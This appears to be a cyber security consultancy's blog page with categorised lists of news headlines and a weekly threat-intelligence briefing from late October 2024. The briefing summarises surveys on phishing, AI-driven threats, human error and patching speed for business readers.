APT29 Spearphishing Campaign Targets Thousands with RDP Files - Infosecurity Magazine

German MPs and their staff fail simple phishing attack test | Tom's Hardware

Russia Is Targeting US Officials in Email Phishing Campaign: Microsoft - Bloomberg

Ukraine Warns of Mass Phishing Campaign Targeting Citizens Data - Infosecurity Magazine

Business Email Compromise (BEC)/Email Account Compromise (EAC)

BEC cyber attacks have the highest financial impact - Digital Journal

This nasty Android trojan is hijacking calls to your bank and sending them to hackers — how to stay safe | Tom's Guide

Business email compromise scams dominate Q3 2024 threats

The Weapon of Choice of Cyber Criminals: BEC Impersonation

Redline Stealer Dominates: VIPRE's Q3 Report Highlights Sophisticated BEC Tactics And Evolving Malware Trends

Phishers reach targets via Eventbrite services - Help Net Security

AI-Powered BEC Scams Zero in on Manufacturers - Infosecurity Magazine

Other Social Engineering

Cyber Scams & Why We Fall for Them - Security Boulevard

BEC cyber attacks have the highest financial impact - Digital Journal

Banks and regulators warn of rise in ‘quishing’ QR code scams

Hackers Sent a Deepfake of Wiz CEO to Dozens of Employees | Entrepreneur

Fraudsters revive old tactics mixed with modern technology - Help Net Security

How Hackers Exploit Google To Target You

Mishing in Motion: Uncovering the Evolving Functionality of FakeCall Malware - Zimperium

Artificial Intelligence

In legal first, Japan convicts man of abusing AI to generate ransomware | Malay Mail

Hackers Sent a Deepfake of Wiz CEO to Dozens of Employees | Entrepreneur

Mozilla: ChatGPT Can Be Manipulated Using Hex Code

AI Cyber Attacks Rise but Businesses Still Lack Insurance - Security Boulevard

Future capabilities of AI-powered threats

How artificial intelligence is lowering the barrier to cyber crime

The AI Paradox in Digital Identity: Why More Security Might Mean Less Privacy (And What to Do About It) - Security Boulevard

Trust and risk in the AI era - Help Net Security

White House Issues New Directive on AI and National Security | UC Berkeley School of Information

Apple is challenging hackers to break into the company's servers | Fortune

Regulators Combat Deepfakes With Anti-Fraud Rules

OWASP Dramatically Expands GenAI Security Guidance with Guides for Handling Deepfakes, Building an AI Security Center of Excellence, and a GenAI Security Solutions Landscape

80 percent believe cyber security skills will be vital in AI environments

2FA/MFA

New Windows Warning As Hacker Breaks Google Chrome 2FA Security Encryption

Malware

New Windows Driver Signature bypass allows kernel rootkit installs

Police hacks, disrupts Redline, Meta infostealer operations - Help Net Security

'All servers' for Redline and Meta infostealers hacked by Dutch police and FBI

Malvertising Campaign Hijacks Facebook Accounts to Spread SYS01stealer Malware

New Xiu Gou Phishing Kit Targets US, Other Countries with Mascot - Infosecurity Magazine

BeaverTail Malware Resurfaces in Malicious npm Packages Targeting Developers

Kremlin-backed hackers have new Windows and Android malware to foist on Ukrainian foes

How a series of opsec failures led US authorities to the alleged developer of the Redline password-stealing malware | TechCrunch

Why Wiping Your Hard Drive Doesn't Always Remove Malware

Mishing in Motion: Uncovering the Evolving Functionality of FakeCall Malware - Zimperium

Government Sector Suffers 236% Surge in Malware Attacks - Infosecurity Magazine

Bots/Botnets

Microsoft: Chinese hackers use Quad7 botnet to steal credentials

Mobile

This nasty Android trojan is hijacking calls to your bank and sending them to hackers — how to stay safe | Tom's Guide

Fitness App Strava Gives Away Location of Biden, Trump and other Leaders, French Newspaper Says - SecurityWeek

Macron's bodyguards show his location by sharing Strava data • The Register

Google Warns Of New Android And Windows Cyber Attack—1 Thing Stops It

Android malware "FakeCall" now reroutes bank calls to attackers

These Samsung phones are at risk for a big security vulnerability | Digital Trends

Russia Targets Ukraine Army via Spoofed Recruitment App

Denial of Service/DoS/DDoS

DDoS attacks surge to unprecedented levels, bombarding servers with 4.2Tbps | Cybernews

Is DDoS being left out in the cold by regulations? | TechFinitive

Russia arrests hacker accused of preventing electronic voting during local election

Internet of Things – IoT

Government Warns Foreign Tech In Cars Is Vulnerable To Hackers, Proposes Ban

IoT needs more respect for its consumers, creations, and itself - Help Net Security

Hackers target critical zero-day vulnerability in PTZ cameras

Data Breaches/Leaks

Free, France’s second largest ISP, confirms data breach after leak

ICO: 55% of UK Adults Have Had Data Lost or Stolen - Infosecurity Magazine

Hacker claims to have data linked to 19 million French mobile and internet customers | ITPro

“You must do better”: Information Commissioner John Edwards calls on firms to beef up support for data breach victims | ITPro

Over 80% of US Small Businesses Have Been Breached - Infosecurity Magazine

OnePoint Patient Care Data Breach Exposes 795,000 Records

Cyber security Breaches Survey 2024: Impact of Cyber Crime | SC Media UK

Combatting Human Error: How To Safeguard Your Business Against Costly Data Breaches

Dozens under investigation in Italy amid scandal over hacked government databases and illegal dossiers

Organised Crime & Criminal Actors

Russia sentences REvil ransomware members to over 4 years in prison

How artificial intelligence is lowering the barrier to cyber crime

REvil convictions unlikely to curb Russian cyber crime | TechTarget

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

Hackers finally unlock man's $3,000,000 Bitcoin wallet after he forgot password for 11 years - Money - UNILAD

Insider Risk and Insider Threats

Ex-Disney techie arrested for potentially deadly menu hacks • The Register

The Overlooked Importance of Identifying Riskiest Users

Combatting Human Error: How To Safeguard Your Business Against Costly Data Breaches

Insider threat hunting best practices and tools | TechTarget

Insurance

AI Cyber Attacks Rise but Businesses Still Lack Insurance - Security Boulevard

Supply Chain and Third Parties

Third-Party Identities: The Weakest Link in Your Cyber Security Supply Chain

How the NIS2 Directive Impacts Supply Chain Cyber Security

Cloud/SaaS

AWS CDK flaw exposed accounts to full takeover • The Register

Black Basta Ransomware Operators Using Microsoft Teams To Breach Organisations

Adversarial groups adapt to exploit systems in new ways - Help Net Security

The SaaS Governance Gap | Grip Security - Security Boulevard

NIS2 Arrives with Major Changes to EU SaaS Cyber Security - Security Boulevard

What the CrowdStrike outage teaches us about cloud security | SC Media

China's 'Evasive Panda' APT Debuts High-End Cloud Hijacking

Black Basta operators phish employees via Microsoft Teams - Help Net Security

Hackers find 15,000 credentials by scanning for git configuration | CyberScoop

Chinese Hackers Use CloudScout Toolset to Steal Session Cookies from Cloud Services

New Details Emerge About Expansive TeamTNT Attacks | MSSP Alert

Outages

Delta Sues CrowdStrike Over ‘Catastrophic’ Software Glitch – BNN Bloomberg

What the CrowdStrike outage teaches us about cloud security | SC Media

When Cyber Security Tools Backfire

The Case Against Abandoning CrowdStrike Post-Outage

Identity and Access Management

Third-Party Identities: The Weakest Link in Your Cyber Security Supply Chain

Three common privilege access mistakes that can lead to a ransomware incident | SC Media

Encryption

Quantum Computing and Cyber Security – Preparing for a New Age of Threats | MSSP Alert

How to achieve crypto-agility and future-proof security | TechTarget

Linux and Open Source

Admins Spring into action over latest open source vuln • The Register

Hardening Linux Servers Against Threats and Attacks | Linux Journal

Passwords, Credential Stuffing & Brute Force Attacks

The state of password security in 2024 - Help Net Security

Hackers find 15,000 credentials by scanning for git configuration | CyberScoop

Microsoft: Chinese hackers use Quad7 botnet to steal credentials

How a series of opsec failures led US authorities to the alleged developer of the Redline password-stealing malware | TechCrunch

Hackers finally unlock man's $3,000,000 Bitcoin wallet after he forgot password for 11 years - Money - UNILAD

Social Media

Malvertising Campaign Hijacks Facebook Accounts to Spread SYS01stealer Malware

Stolen credit cards up for grabs on Meta’s Threads • The Register

Facebook Businesses Targeted in Infostealer Phishing Campaign

Malicious Ads Are Flooding Facebook: Here's How to Stay Safe

Russia fines Google more than world's entire GDP for blocking YouTube accounts | World News | Sky News

Malvertising

Malvertising Campaign Hijacks Facebook Accounts to Spread SYS01stealer Malware

Malicious Ads Are Flooding Facebook: Here's How to Stay Safe

Training, Education and Awareness

For a Stronger Security Culture, Replace Sticks With Carrots

3 crucial considerations for your security awareness and training program | CSO Online

Regulations, Fines and Legislation

New Cyber Security Rules for Financial Institutions in New York State Take Effect November 1, 2024 - Security Boulevard

NIS2 Arrives with Major Changes to EU SaaS Cyber Security - Security Boulevard

NIS2 directive impact | Professional Security Magazine

NIS2 Compliance Puts Strain on Business Budgets - Infosecurity Magazine

GDPR for HR | ICO enforcement and the new data protection audit framework, and data privacy risks in pre-employment vetting - Osborne Clarke | Osborne Clarke

Cyber Security | UK Regulatory Outlook October 2024 - Osborne Clarke | Osborne Clarke

UK organisations scrambling to divert funds for NIS2 compliance spending | ITPro

The SEC is Cracking Down on Misleading Cyber Security Disclosure | Fenwick & West LLP - JDSupra

Industry trade groups still have ‘concerns’ with cyber reporting mandate | CyberScoop

Is DDoS being left out in the cold by regulations? | TechFinitive

Regulators Combat Deepfakes With Anti-Fraud Rules

Models, Frameworks and Standards

NIS2 Arrives with Major Changes to EU SaaS Cyber Security - Security Boulevard

NIS2 directive impact | Professional Security Magazine

UK organisations scrambling to divert funds for NIS2 compliance spending | ITPro

GDPR for HR | ICO enforcement and the new data protection audit framework, and data privacy risks in pre-employment vetting - Osborne Clarke | Osborne Clarke

OWASP Dramatically Expands GenAI Security Guidance with Guides for Handling Deepfakes, Building an AI Security Center of Excellence, and a GenAI Security Solutions Landscape

The Department of Defense Issues Final Rule Establishing CMMC 2.0 | Pillsbury Winthrop Shaw Pittman LLP - JDSupra

Backup and Recovery

Is Backup Testing Part of Your Security Strategy? | HackerNoon

Data Protection

ICO: 55% of UK Adults Have Had Data Lost or Stolen - Infosecurity Magazine

“You must do better”: Information Commissioner John Edwards calls on firms to beef up support for data breach victims | ITPro

GDPR for HR | ICO enforcement and the new data protection audit framework, and data privacy risks in pre-employment vetting - Osborne Clarke | Osborne Clarke

Careers, Working in Cyber and Information Security

More than a third of UK businesses lack expertise in emerging tech risks amid cyber attacks – Hiscox | Insurance Times

99% of CISOs work extra hours every week - Help Net Security

Mastering Cyber Security: A Comprehensive Guide to Self-Learning - Security Boulevard

Aldi managers paid more than government cyber security expert

UK needs cyber security professionals, but won't pay up • The Register

80 percent believe cyber security skills will be vital in AI environments

The Government Wants You to Fight Cyber Crime. Do You Have What It Takes?

Cyber security Awareness Month: 5 new AI skills cyber pros need

Law Enforcement Action and Take Downs

In legal first, Japan convicts man of abusing AI to generate ransomware | Malay Mail

Alexander McCartney: Catfish killer brought down by one phone call - BBC News

Police hacks, disrupts Redline, Meta infostealer operations - Help Net Security

'All servers' for Redline and Meta infostealers hacked by Dutch police and FBI

Two notorious infostealer malware operations were just knocked offline | ITPro

How a series of opsec failures led US authorities to the alleged developer of the Redline password-stealing malware | TechCrunch

FBI has conducted more than 30 disruption operations in 2024 | CyberScoop

REvil convictions unlikely to curb Russian cyber crime | TechTarget

Russia arrests hacker accused of preventing electronic voting during local election

Misinformation, Disinformation and Propaganda

Russians behind fake video of ballots being destroyed, US officials say | US elections 2024 | The Guardian

Senator says domain reg firms aiding Russian disinfo spread • The Register


Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

What can businesses learn from the rise of cyber espionage?

Nation State Actors

Cyber threats surge from state-sponsored and criminal actors

China

China's 'Evasive Panda' APT Debuts High-End Cloud Hijacking

US says Chinese hackers breached multiple telecom providers

Microsoft: Chinese hackers use Quad7 botnet to steal credentials

Government Warns Foreign Tech In Cars Is Vulnerable To Hackers, Proposes Ban

Chinese Hackers Use CloudScout Toolset to Steal Session Cookies from Cloud Services

Inside Sophos' 5-Year War With the Chinese Hackers Hijacking Its Devices | WIRED

Chinese hackers targeted phones used by Trump and Vance, New York Times reports - The Hindu

Donald Trump and JD Vance potential targets of China cyber attack - BBC News

Chinese Hackers Reportedly Targeted Trump, Vance Phones

China's Elite Cyber Corps Hone Skills on Virtual Battlefields

Russia and China-linked state hackers intensify attacks on Netherlands, security officials warn

Beijing claims it's found spy devices at sea • The Register

Canada Faces 'Second-to-None' PRC-Backed Threat Actors

Russia

Russia Carrying Out Targeted Attacks In UK, Microsoft Warns

Amazon seizes domains used in rogue Remote Desktop campaign to steal data

New Cyber Attack Warning—Confirming You Are Not A Robot Can Be Dangerous

APT29 Spearphishing Campaign Targets Thousands with RDP Files - Infosecurity Magazine

Google Warns Of New Android And Windows Cyber Attack—1 Thing Stops It

Microsoft Warns of Russian Spear-Phishing Attacks Targeting Over 100 Organisations - SecurityWeek

Russian Hackers Pose as Microsoft Employees in Email Phishing Attacks

Russian spies using remote desktop protocol files to phish • The Register

Russians behind fake video of ballots being destroyed, US officials say | US elections 2024 | The Guardian

Senator says domain reg firms aiding Russian disinfo spread • The Register

Russia’s ‘Midnight Blizzard’ hackers target government workers in novel info-stealing campaign

Kremlin-backed hackers have new Windows and Android malware to foist on Ukrainian foes

Sweden and Norway rethink cashless society plans over Russia security fears | Sweden | The Guardian

Pro-Russia hackers claim Greater Manchester council cyber attacks - BBC News

Kremlin-linked hackers target Ukraine’s state, military agencies in new espionage campaign

Russia and China-linked state hackers intensify attacks on Netherlands, security officials warn

Russia Targets Ukraine Army via Spoofed Recruitment App

Russia Is Targeting US Officials in Email Phishing Campaign: Microsoft - Bloomberg

Ukraine Warns of Mass Phishing Campaign Targeting Citizens Data - Infosecurity Magazine

REvil convictions unlikely to curb Russian cyber crime | TechTarget

Russia sentences REvil ransomware members to over 4 years in prison

Russia fines Google more than world's entire GDP for blocking YouTube accounts | World News | Sky News

Iran

Cyber threats surge from state-sponsored and criminal actors

Iran Hackers Peddle Stolen Trump Emails

North Korea

Cyber threats surge from state-sponsored and criminal actors

North Korean govt hackers linked to Play ransomware attack


Tools and Controls

For a Stronger Security Culture, Replace Sticks With Carrots

Threat actors are stepping up their tactics to bypass email protections - Help Net Security

The Overlooked Importance of Identifying Riskiest Users

Is Backup Testing Part of Your Security Strategy? | HackerNoon

The SaaS Governance Gap | Grip Security - Security Boulevard

Proactive and responsible disclosure | Professional Security Magazine

When Cyber Security Tools Backfire

What Military Wargames Can Teach Us About Cyber Security

Attack surface management: The key to securing expanding digital frontiers | SC Media

Are You Truly Protected? The Hidden Detection Gaps in Your MSSP’s Defence Against Modern Threats | Accelerynt, Inc. - JDSupra

New report reveals persistent API security breaches risk

Hackers are swiping cookies to bypass email security, FBI says - UPI.com

US, Australia Release New Security Guide for Software Makers - SecurityWeek

GDPR for HR | ICO enforcement and the new data protection audit framework, and data privacy risks in pre-employment vetting - Osborne Clarke | Osborne Clarke

More Than Just a Corporate Wiki? How Threat Actors are Exploiting Confluence - Security Boulevard

Why cyber tools fail SOC teams - Help Net Security

Into the Wild: Using Public Data for Cyber Risk Hunting

API Security Matters: The Risks of Turning a Blind Eye - SecurityWeek

Designing a Future-focused Cyber Security Investment Strategy - SecurityWeek

The Power of Proactive Risk Assessments in Cyber Security - Security Boulevard

Risk hunting: A proactive approach to cyber threats - Help Net Security

Top 10 Cyber Security Metrics and KPIs | Mimecast

Apple opens Private Cloud Compute to public scrutiny • The Register

German MPs and their staff fail simple phishing attack test | Tom's Hardware

Insider threat hunting best practices and tools | TechTarget

How IT leaders can assess “secure-by-design” software claims | CIO

Companies are spending barely any IT budget on security | TechRadar


Reports Published in the Last Week

VIPRE’s Email Threat Trends Report: Q3 2024 - VIPRE


Other News

Small Businesses Boosting Cyber Security as Threats Grow: ITRC - Security Boulevard

13 Cyber Crime Facts That Will Give You Chills | HackerNoon

Spooky Cyber Stats and Trends in Time for Halloween

Five Eyes Agencies Launch Startup Security Initiative - Infosecurity Magazine

Five Eyes tell tech startups to take infosec seriously • The Register

Navigating Cyber and Legal Challenges During the M&A Process: Quick Considerations for Federal Contractors | BakerHostetler - JDSupra

Terrifying Trends in the 2024 Cyber Threat Landscape - Security Boulevard

Stop being a sitting target for cyber threats! | TechRadar

Healthcare Breaches Costliest for 12 Years Running, Hit New $10.1M Record High

Irish businesses now facing more than one cyber attack per week

Funding crisis ‘puts universities at higher risk of cyber attacks’

CISA Launches First International Cyber Security Plan - Infosecurity Magazine

Lateral Movement in Recent Cyber Security Breaches - Security Boulevard

Government Sector Suffers 236% Surge in Malware Attacks - Infosecurity Magazine

US, Australia Release New Security Guide for Software Makers - SecurityWeek

Proactive & Preventative Cyber Defence - DevX

Law firms continue to focus on managing risk “across the board” legal training data shows - Legal Futures

OT security becoming a mainstream concern | CSO Online

Microsoft delays its troubled AI-powered Recall feature yet again | ZDNET

The University of Manchester avoided disaster in last year’s cyber attack – now it wants to set an industry example | ITPro

"Take it seriously and act now": Jersey's Head of Cyber Security warns islanders of digital threats | ITV News Channel


Vulnerability Management

Many financial firms have high-severity software security flaws over a year old | TechRadar

Put End-of-Life Software to Rest

Microsoft Update Warning—400 Million Windows PCs Now At Risk

A Sherlock Holmes Approach to Cyber Security: Eliminate the Impossible with Exposure Validation

Microsoft will charge Windows 10 users $30 per year for security updates | Tom's Hardware

Vulnerabilities

More Details Shared on Windows Downgrade Attacks After Microsoft Rolls Out Mitigations - SecurityWeek

Apple Patches Over 70 Vulnerabilities Across iOS, macOS, Other Products - SecurityWeek

New tool bypasses Google Chrome’s new cookie encryption system

AWS CDK flaw exposed accounts to full takeover • The Register

New Cisco ASA and FTD features block VPN brute-force password attacks

New Windows Driver Signature bypass allows kernel rootkit installs

Fog ransomware targets SonicWall VPNs to breach corporate networks

Patched SonicWall critical vulnerability still used in several ransomware attacks | CSO Online

Researchers Uncover OS Downgrade Vulnerability Targeting Microsoft Windows Kernel

New Research Reveals Spectre Vulnerability Persists in Latest AMD and Intel Processors

Wi-Fi Alliance test suite has a worrying security flaw | TechRadar

New Windows Warning As Hacker Breaks Google Chrome 2FA Security Encryption

Synology, QNAP, TrueNAS Address Vulnerabilities Exploited at Pwn2Own Ireland - SecurityWeek

Google Patches Critical Chrome Vulnerability Reported by Apple - SecurityWeek

Fortinet Updates Guidance and Indicators of Compromise following FortiManager Vulnerability Exploitation | CISA

LiteSpeed Cache Plugin Vulnerability Poses Admin Access Risk - Infosecurity Magazine

Admins Spring into action over latest open source vuln • The Register

Opera Browser Fixes Big Security Hole That Could Have Exposed Your Information

These Samsung phones are at risk for a big security vulnerability | Digital Trends

CVE-2024-9680 – Mozilla Firefox Security Vulnerability – October 2024 - Security Boulevard

Hackers target critical zero-day vulnerability in PTZ cameras


Sector Specific

Industry specific threat intelligence reports are available.

Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3


Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog, also available on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.

Black Arrow Admin

Black Arrow Cyber Threat Intelligence Briefing 25 October 2024

Black Arrow Cyber Threat Intelligence Briefing 25 October 2024:

-Overconfidence in Cyber Security: A Hidden Risk

-Gallagher Re Study Links Cyber Security Gaps to Higher Insurance Claims

-AI and Deepfakes Fuel Phishing Scams, Making Detection Harder

-AI-Generated Cyber Threats Have C-Suite Leaders on Edge

-The Single Biggest Vulnerability in Your Cyber Security Is You

-Why Cyber Security Acumen Matters in the C-Suite

-Cyber Incidents Surge, Damaging Brand Trust and Business Relationships – Hiscox

-Cyber Resilience vs Cyber Security: Which is More Critical?

-Phishing Attacks Snare Security and IT Leaders

-CISO Role Gaining Influence as 20% Report Directly to CEOs, Finds Survey

-Threat Actors Are Exploiting Vulnerabilities Faster Than Ever

-Employees Lack Fundamental Security Awareness

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.

Top Cyber Stories of the Last Week

Overconfidence in Cyber Security: A Hidden Risk

Organisations often assume that adding more cyber security tools equates to better protection, yet this overconfidence can lead to blind spots. Companies with fragmented solutions are 3.5 times more likely to face major security incidents. The Uber data breach in 2022 illustrated how alert fatigue—where excessive notifications overwhelm teams—can lead to overlooked threats, even with advanced tools in place. To counter this, experts recommend streamlining cyber security systems, prioritising critical alerts, and regularly auditing security processes. Building a resilient defence isn’t about quantity but the strategic use of technology paired with continuous training and monitoring.

Gallagher Re Study Links Cyber Security Gaps to Higher Insurance Claims

Gallagher Re's recent study, using data from Bitsight and its own cyber incident records, highlights that gaps in cyber security increase the risk of incidents and insurance claims. Organisations with larger cyber footprints, such as extensive IP address networks, are particularly vulnerable, pointing to a need for insurers to consider technographic data alongside traditional metrics. The study suggests that targeted use of external scanning data could help insurers lower loss ratios by up to 16.4%, focusing on the most damaging risks. Basic cyber hygiene, including rapid patching and endpoint management, remains essential for mitigating incidents and reducing potential claims.

AI and Deepfakes Fuel Phishing Scams, Making Detection Harder

Teleport's study highlights that AI-powered impersonation and deepfake-driven phishing are now the hardest cyber threats for businesses to defend against, with 52% of respondents marking these as particularly challenging. AI has enabled cyber criminals to create highly convincing phishing scams targeting credentials, significantly lowering both the cost and skill needed to launch attacks. Despite the adoption of AI tools by 68% of organisations to combat these threats, overconfidence in AI's protective capabilities may be risky.

AI-Generated Cyber Threats Have C-Suite Leaders on Edge

AI-driven cyber attacks are becoming a major concern for senior executives, as sophisticated deepfakes and AI phishing scams pose evolving risks. A recent gathering of over 100 cyber security leaders in Silicon Valley highlighted the growing difficulty in combating AI-powered phishing attacks, with three-quarters of surveyed Fortune 500 security officers reporting significant challenges. Additionally, over half noted the increasing prevalence of deepfake audio and video impersonations. The threat is amplified by AI tools that often lack proper data governance, potentially exposing organisations to heightened risks from third-party suppliers, with predicted fraud losses in the US expected to climb to $40 billion by 2027.

The Single Biggest Vulnerability in Your Cyber Security Is You

A recent report highlights that human error accounts for 68% of successful cyber attacks, indicating it as a significant vulnerability within cyber security. Despite advances in technical defences, human-centric errors, such as skills-based and knowledge-based mistakes, persist as weak points. Current cyber security education and policy efforts focus largely on technical defences, but often overlook the psychological aspects of behaviour. Experts suggest that minimising cognitive load, fostering a positive cyber security culture, and adopting long-term strategies for behavioural change are crucial to reducing human error and building a more resilient cyber security posture.

Why Cyber Security Acumen Matters in the C-Suite

As generative AI and sophisticated cyber threats rise, the need for cyber security expertise within the C-suite has become critical. Effective leaders must balance AI-driven innovations with a strong cyber security framework to prevent potential breaches. This alignment is essential for strategic decision-making, resource allocation, and collaborative crisis response. Boards and CEOs who understand these risks are better positioned to safeguard data, intellectual property, and reputation. Regulatory expectations are increasing, and companies that prioritise cyber security acumen are better prepared to handle compliance challenges and adapt swiftly to evolving threats.

Cyber Incidents Surge, Damaging Brand Trust and Business Relationships – Hiscox

The latest Hiscox Cyber Readiness Report reveals a surge in cyber incidents, with 70% of UK organisations and 67% globally experiencing increased attacks over the past year. This rise in cyber threats is eroding brand trust and impacting business relationships. Nearly half of affected firms face challenges in attracting new customers, a sharp rise from 20% last year, with 43% reporting a loss of existing customers. Additionally, many organisations have integrated Generative AI, with over half acknowledging heightened cyber risk. Yet, a lack of expertise remains, with 37% of UK businesses underprepared to address these evolving risks.

Cyber Resilience vs Cyber Security: Which is More Critical?

Focusing on cyber resilience is increasingly essential for organisations today. Unlike traditional cyber security, which aims to prevent breaches, cyber resilience emphasises an organisation’s ability to continue operating amidst an incident. By adopting a culture of resilience, organisations can safeguard their operations, data, and reputation—even in the face of a cyber attack. Investing in resilience, beginning with people and culture, offers a strong return as it prepares businesses to adapt quickly to adversities. Moreover, in an era of heightened threats, cyber resilience is becoming a competitive advantage, enhancing trust with customers, stakeholders, and insurers.

Phishing Attacks Snare Security and IT Leaders

A recent survey by Arctic Wolf and Sapio Research highlights persistent vulnerabilities in cyber security culture, despite IT leaders’ high confidence levels. While 80% of leaders feel prepared against phishing, nearly two-thirds admitted to clicking on phishing links themselves. Moreover, 36% of IT leaders have bypassed their own security protocols, exposing organisations to heightened risks. In addition, 68% of security professionals reuse passwords, a significant lapse in cyber hygiene. To address these issues, experts advocate for personalised, behaviour-based training and a proactive reporting culture. Only 60% of firms have adopted AI policies, with just 29% of end users aware of these policies, underscoring a need for clearer communication.

CISO Role Gaining Influence as 20% Report Directly to CEOs, Finds Survey

A recent Deloitte Global survey highlights the increasing strategic importance of cyber security in business, with 20% of chief information security officers (CISOs) now reporting directly to CEOs. Covering responses from nearly 1,200 cyber leaders worldwide, the report shows CISOs are evolving from technical experts to key advisers on cross-business risk and resilience, a role intensified by the rise in AI-driven cyber threats. High-performing organisations lead in integrating AI into cyber defence, aiming for 27% better outcomes. Nearly 60% plan to increase cyber budgets, emphasising the alignment of security initiatives with broader digital investments and strategic growth.

Threat Actors Are Exploiting Vulnerabilities Faster Than Ever

Mandiant’s recent research highlights the urgent need for rapid patching as attackers are now exploiting vulnerabilities within just five days on average, a steep drop from 63 days in 2018. The study, based on 138 vulnerabilities disclosed in 2023, reveals a significant shift toward zero-day exploits, now outpacing N-day vulnerabilities. Zero-day vulnerabilities are unknown to vendors and lack available patches at the time of disclosure; N-day vulnerabilities are security flaws that have already been publicly disclosed and typically have a patch available but may remain unaddressed on systems, creating opportunities for cyber attacks. The report underscores that while patching is essential, implementation can be slow, particularly across large systems, mobile devices, or critical infrastructure where operational disruptions pose serious risks.

Employees Lack Fundamental Security Awareness

A recent Fortinet survey highlights growing concern among executives regarding employee cyber security awareness, with 70% stating their teams lack essential knowledge – a significant increase from last year. Over 60% expect a rise in employee-targeted cyber attacks leveraging AI. Positively, 80% of organisations are now more open to implementing security awareness initiatives. Nearly half of these leaders deliver training content quarterly, with phishing prevention as a top focus. The findings underline the necessity of a strong first line of defence, with targeted campaigns and accessible training vital to enhancing organisational cyber resilience.

Sources:

https://www.informationweek.com/cyber-resilience/overconfidence-in-cybersecurity-a-hidden-risk

https://www.insurancebusinessmag.com/us/news/reinsurance/gallagher-re-study-links-cybersecurity-gaps-to-higher-insurance-claims-510935.aspx

https://www.helpnetsecurity.com/2024/10/24/ai-impersonation-cyberattack-vector/

https://fortune.com/2024/10/24/ai-generated-cyber-threats-c-suite-cfo-leaders-edge/

https://www.sciencealert.com/the-single-biggest-vulnerability-in-your-cyber-security-is-you

https://www.darkreading.com/vulnerabilities-threats/why-cybersecurity-acumen-matters-c-suite

https://www.insurancebusinessmag.com/us/news/cyber/cyber-incidents-surge-damaging-brand-trust-and-business-relationships--hiscox-511167.aspx

https://betanews.com/2024/10/18/cyber-resilience-vs-cybersecurity-which-is-more-critical/

https://securityboulevard.com/2024/10/phishing-attacks-snare-security-it-leaders/

https://www.techmonitor.ai/technology/cybersecurity/ciso-role-gaining-influence-as-20-report-directly-to-ceos-finds-survey

https://www.techrepublic.com/article/threat-actors-mandiant-report-2024/

https://betanews.com/2024/10/23/employees-lack-fundamental-security-awareness/


Governance, Risk and Compliance

CISOs Concerned Over Growing Demands of Role - Security Boulevard

Lack of investment leaving firms open to cyber attack - PwC – The Irish Times

AI-generated cyber threats have C-suite leaders on edge | Fortune

Cyber incidents surge, damaging brand trust and business relationships – Hiscox | Insurance Business America

Poor MFA, identity attacks dominate threat landscape in Q3 2024 | SC Media

Why Cyber Security Acumen Matters in the C-Suite

Overconfidence in Cyber Security: A Hidden Risk

Call for cyber security sea change as world looks to meet rising threats

Joe Sullivan: CEOs must be held accountable for security too | TechTarget

Cyber resilience vs. cybersecurity: Which is more critical? (betanews.com)

CISOs: Throwing Cash at Tools Isn't Helping Detect Breaches (darkreading.com)

CISO role gaining influence as 20% report directly to CEOs, finds survey

CISOs respond: 49% of CISOs plan to leave role without industry action | Security Magazine

In 2025 Security And Risk Pros Will Brace For Regulations And Resilience (forbes.com)

Gartner's 2025 tech trends show how your business needs to adapt - and fast | ZDNET

Effective strategies for measuring and testing cyber resilience - Help Net Security

Why strong cyber security means we must reduce complexity | World Economic Forum

Is the future of tech roles fractional? - BusinessCloud

Achieving peak cyber resilience - Help Net Security

68% of directors don't have a board-approved AI policy - IoD Ireland

Board Members Should Review Cyber Risk Disclosure Procedures Following SEC Enforcement

Building Digital Resilience: Insider Insights For A Safer Cyber Landscape (informationsecuritybuzz.com)

Putting the “R” back in GRC - Insights from Gartner on Emerging Cyber GRC Technologies - Security Boulevard

Best Cyber Security Metrics to Use in the Boardroom | Kovrr - Security Boulevard

CISO Insights: 10 modern capabilities to revamp your security | Fastly

What CIOs Must Consider With Sophos Buying Secureworks

Unclear pricing for GRC tools creates market confusion - Help Net Security

What’s next after the CISO role? | CSO Online


Threats

Ransomware, Extortion and Destructive Attacks

The evolution of cyber crime: How ransomware became the weapon of choice | TechRadar

Healthcare Sees 300% Surge in Ransomware Attacks

ESET partner breached to send data wipers to Israeli orgs (bleepingcomputer.com)

Ransomware Rising – Understanding, Preventing and Surviving Cyber Extortion - Security Boulevard

Akira is encrypting again after abandoning double extortion • The Register

Ransomware Gangs Use LockBit's Fame to Intimidate Victims in Latest Attacks

NotLockBit: Ransomware Discovery Serves As Wake-Up Call For Mac Users | Tripwire

A Dangerous Alliance: Scattered Spider, RansomHub Join Forces

CISA confirms Veeam vulnerability is being used in ransomware attacks (therecord.media)

Phishing Scams & Ransomware: Fortinet's Threat Intelligence Highlights Election Cyber Risks (thefastmode.com)

NotLockBit Ransomware Can Target macOS Devices - SecurityWeek

Embargo Ransomware Gang Deploys Customized Defence Evasion Tools - Infosecurity Magazine (infosecurity-magazine.com)

New Qilin.B Ransomware Variant Emerges with Improved Encryption and Evasion Tactics

Government is fed up with ransomware payments fueling cyber attacks (cnbc.com)

Has BlackCat returned as Cicada3301? Maybe.

Chinese trader laundered more than $17M for Lazarus Group in 25 hacks (cointelegraph.com)

Ransomware protection: AI and strategies to combat rising threats - SiliconANGLE

Ransomware attacks against healthcare orgs is on the rise, Microsoft says (qz.com)

